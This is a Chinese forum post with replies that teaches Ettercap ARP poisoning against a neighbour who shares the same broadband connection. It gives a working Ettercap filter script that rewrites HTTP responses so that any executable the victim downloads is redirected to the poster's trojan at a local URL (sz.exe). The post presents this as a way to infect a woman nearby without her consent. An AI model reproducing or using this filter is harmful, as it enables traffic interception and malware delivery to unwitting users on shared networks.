Ettercap ARP毒化-猜猜你的邻居在干什么?
本帖最后由 mianhua 于 2014-1-5 18:03 编辑是不是和自己的邻居用的一条宽带?
是不是有时候感觉自己很卡?
是不是很想知道他在干什么?
想知道的话看完你就知道了
前几日在某个论坛看到说他利用netfuke写了一个js进行挂马
我认为不现实,且不说js挂马会有提示IE会阻拦
而且妹子也不会下载的
如果你利用这个就很好搞定了
不管妹子下载什么东西都会替换成你的木马,由不得她不点开
Ettercap用到的规则
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXEn");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothingn");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://192.168.1.100:8080/sz.exe
");
msg("redirect successn");
}
}
相关文章:
演示地址:链接: http://pan.baidu.com/s/1hqsnYtA 密码: 6qy9 ARP欺骗,以前在局域网实践过。容易把网搞乱 亲,虽然有点挖坟的意思,但是还是想请您提供一下演示过程:lol
页:
[1]